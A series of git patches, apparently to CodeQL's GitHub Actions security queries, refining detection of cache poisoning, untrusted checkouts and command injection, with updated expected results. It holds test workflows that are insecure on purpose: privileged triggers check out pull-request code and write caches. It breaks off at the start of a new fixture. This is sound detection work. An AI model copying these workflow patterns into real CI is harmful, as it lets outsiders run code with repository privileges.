5dd0081f61e9..67bbfa2a4fea 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -36,18 +36,18 @@ class JavascriptImportnUsesStep extends PoisonableStep, UsesStep { } class LocalScriptExecutionRunStep extends PoisonableStep, Run { - string cmd; + string path; LocalScriptExecutionRunStep() { - exists(string line, string regexp, int command_group | + exists(string line, string regexp, int path_group | line = this.getScript().splitAt("\n").trim() | - poisonableLocalScriptsDataModel(regexp, command_group) and - cmd = line.regexpCapture(regexp, command_group) + poisonableLocalScriptsDataModel(regexp, path_group) and + path = line.regexpCapture(regexp, path_group) ) } - string getCommand() { result = cmd } + string getPath() { result = normalizePath(path.splitAt(" ")) } } class LocalActionUsesStep extends PoisonableStep, UsesStep { diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index df3e1e4d8a2e..100a9c5dd5d4 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -151,12 +151,6 @@ predicate containsHeadRef(string s) { ) } -private string getStepCWD() { - // TODO: This should be the path of the git command. - // Read if from the step's CWD, workspace or look for a cd command. - result = "?" -} - /** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { abstract string getPath(); @@ -208,7 +202,7 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt override string getPath() { if exists(this.(UsesStep).getArgument("path")) then result = this.(UsesStep).getArgument("path") - else result = "?" + else result = "GITHUB_WORKSPACE/" } } @@ -252,7 +246,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { override string getPath() { if exists(this.(UsesStep).getArgument("path")) then result = this.(UsesStep).getArgument("path") - else result = "?" + else result = "GITHUB_WORKSPACE/" } } @@ -277,7 +271,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -298,7 +292,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -321,7 +315,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -341,5 +335,5 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index bda8224925ec..91bb4d3bc5a3 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -18,29 +18,6 @@ import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -/** - * Holds if the path cache_path is a subpath of the path untrusted_path. - */ -bindingset[cache_path, untrusted_path] -predicate controlledCachePath(string cache_path, string untrusted_path) { - exists(string normalized_cache_path, string normalized_untrusted_path | - ( - cache_path.regexpMatch("^[a-zA-Z0-9_-].*") and - normalized_cache_path = "./" + cache_path.regexpReplaceAll("/$", "") - or - normalized_cache_path = cache_path.regexpReplaceAll("/$", "") - ) and - ( - untrusted_path.regexpMatch("^[a-zA-Z0-9_-].*") and - normalized_untrusted_path = "./" + untrusted_path.regexpReplaceAll("/$", "") - or - normalized_untrusted_path = untrusted_path.regexpReplaceAll("/$", "") - ) and - normalized_cache_path.substring(0, normalized_untrusted_path.length()) = - normalized_untrusted_path - ) -} - query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob job, Event event, Step source, Step step, string message, string path @@ -86,7 +63,7 @@ where step.(CacheWritingStep).getPath() = "?" or // the cache writing step reads from a path the attacker can control - not path = "?" and controlledCachePath(step.(CacheWritingStep).getPath(), path) + not path = "?" and isSubpath(step.(CacheWritingStep).getPath(), path) ) and not step instanceof PoisonableStep select step, source, step, diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index 5948474d21ad..b9652d46b59f 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -1,7 +1,7 @@ name: Test on: - issue_comment: + pull_request_target: permissions: actions: write @@ -11,6 +11,8 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} - name: Set up Python 3.10 uses: actions/setup-python@v5 with: @@ -22,14 +24,3 @@ jobs: path: ./results/pip key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} restore-keys: ${{ runner.os }}-pip- - - name: Download artifact - uses: dawidd6/action-download-artifact@v2 - with: - name: results - path: results/ - - name: Upload results - uses: actions/upload-artifact@v4 - with: - name: results - path: results/ - if-no-files-found: ignore diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml new file mode 100644 index 000000000000..9afe62d69da0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml @@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ~/.grade/caches/ + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml new file mode 100644 index 000000000000..b39bc7a880f9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml @@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: /tmp/caches/ + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index 8bd69d8f245a..f45755adf1d7 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected @@ -12,10 +12,8 @@ edges | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | -| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | -| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | -| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | +| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | | .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | @@ -24,6 +22,12 @@ edges | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step | | .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | | .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | @@ -45,4 +49,4 @@ edges | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index a515bd87334f..cc5ce9bdf874 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected @@ -12,10 +12,8 @@ edges | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | -| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | -| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | -| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | +| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | | .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | @@ -24,6 +22,12 @@ edges | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step | | .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | | .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | From 1a5a3044c2447e3a58454eba41a134e786d51321 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 18:25:31 +0200 Subject: [PATCH 546/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 8447d10d94bf..a453e0c96129 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.56 +version: 0.1.57 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b167a960886d..b90f38e4b1a4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.56 +version: 0.1.57 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4fffde2fc58962940f4389aab1635b7ce1d6e352 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 21:38:38 +0200 Subject: [PATCH 547/707] Add remote flow sources as a mutable ref source for untrusted checkouts --- .../actions/security/UntrustedCheckoutQuery.qll | 12 ++++++++++++ .../CWE-829/UntrustedCheckoutCritical.expected | 4 ++++ 2 files changed, 16 insertions(+) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 100a9c5dd5d4..a3ea6be06fc8 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -1,5 +1,6 @@ import actions private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources private import codeql.actions.TaintTracking /** @@ -8,6 +9,17 @@ private import codeql.actions.TaintTracking */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { + // remote flow sources + source instanceof ArtifactSource + or + source instanceof GitHubCtxSource + or + source instanceof GitHubEventCtxSource + or + source instanceof GitHubEventJsonSource + or + source instanceof MaDSource + or // `ref` argument contains the PR id/number or head ref exists(Expression e | source.asExpr() = e and diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 9358d65e8f4b..4dc2b53e5910 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -266,6 +266,10 @@ edges #select | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | From 1b3b47bb1edfa5704b0e5538db4395112a43786e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 21:39:51 +0200 Subject: [PATCH 548/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a453e0c96129..6f57c4554d07 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.57 +version: 0.1.58 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b90f38e4b1a4..d3b65425c413 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.57 +version: 0.1.58 groups: [actions, queries] suites: codeql-suites extractor: javascript From f2c5a14883fb0ebc859f4dabd73051c8245eba37 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 28 Sep 2024 23:57:32 +0200 Subject: [PATCH 549/707] Fix: ControlChecks protects/dominates only work with Steps. A sink can be in a sub-step node (eg: ScalarValue) --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 12 ++ .../codeql/actions/security/ControlChecks.qll | 22 +- .../CWE-077/EnvVarInjectionCritical.ql | 11 +- .../CWE-078/CommandInjectionCritical.ql | 6 +- .../CWE-077/.github/workflows/test11.yml | 81 ++++++++ .../CWE-077/.github/workflows/test12.yml | 80 +++++++ .../CWE-077/EnvVarInjectionCritical.expected | 19 ++ .../CWE-077/EnvVarInjectionMedium.expected | 16 ++ .../actions/run-airbyte-ci/action.yaml | 196 ++++++++++++++++++ .../CWE-078/.github/workflows/test1.yml | 63 ++++++ .../CWE-078/CommandInjectionCritical.expected | 7 + .../CWE-078/CommandInjectionMedium.expected | 9 + 13 files changed, 507 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 17b0dab4ee67..63f2552f5829 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -13,6 +13,8 @@ class AstNode instanceof AstNodeImpl { string toString() { result = super.toString() } + Step getEnclosingStep() { result = super.getEnclosingStep() } + Job getEnclosingJob() { result = super.getEnclosingJob() } Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5361943331b2..d4716f89e191 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -110,6 +110,18 @@ abstract class AstNodeImpl extends TAstNode { result = this.getEnclosingCompositeAction().getACallerJob() } + /** + * Gets the enclosing Step. + */ + StepImpl getEnclosingStep() { + if this instanceof StepImpl + then result = this + else + if this instanceof ScalarValueImpl + then result.getAChildNode*() = this.getParentNode() + else none() + } + /** * Gets the enclosing workflow if any. */ diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 052b22cd3387..b9410f0fcb02 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -37,29 +37,29 @@ abstract class ControlCheck extends AstNode { this instanceof Run } - predicate protects(Step step, Event event, string category) { + predicate protects(AstNode node, Event event, string category) { // The check dominates the step it should protect - this.dominates(step) and + this.dominates(node) and // The check is effective against the event and category this.protectsCategoryAndEvent(category, event.getName()) and // The check can be triggered by the event this.getEnclosingJob().getATriggerEvent() = event } - predicate dominates(Step step) { + predicate dominates(AstNode node) { this instanceof If and ( - step.getIf() = this or - step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + node.getEnclosingStep().getIf() = this or + node.getEnclosingJob().getIf() = this or + node.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + node.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this ) or this instanceof Environment and ( - step.getEnclosingJob().getEnvironment() = this + node.getEnclosingJob().getEnvironment() = this or - step.getEnclosingJob().getANeededJob().getEnvironment() = this + node.getEnclosingJob().getANeededJob().getEnvironment() = this ) or ( @@ -67,9 +67,9 @@ abstract class ControlCheck extends AstNode { this instanceof UsesStep ) and ( - this.(Step).getAFollowingStep() = step + this.(Step).getAFollowingStep() = node.getEnclosingStep() or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step) + node.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step) ) } diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index b301915d79c5..ad97dd3caefd 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -22,19 +22,20 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, E where EnvVarInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr(), event) and - not exists(ControlCheck check | - check.protects(sink.getNode().asExpr(), event, "envvar-injection") - ) and // exclude paths to file read sinks from non-artifact sources ( + // source is text not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check.protects(sink.getNode().asExpr(), event, "code-injection") + check.protects(sink.getNode().asExpr(), event, ["envvar-injection", "code-injection"]) ) or + // source is an artifact or a file from an untrusted checkout source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) + check + .protects(sink.getNode().asExpr(), event, + ["envvar-injection", "untrusted-checkout", "artifact-poisoning"]) ) and ( sink.getNode() instanceof EnvVarInjectionFromFileReadSink or diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index 80281e8db30a..c3d6fa74f6c5 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -16,11 +16,15 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Event event where CommandInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr(), event) + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, ["command-injection", "code-injection"]) + ) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml new file mode 100644 index 000000000000..2c2480f5353c --- /dev/null +++ 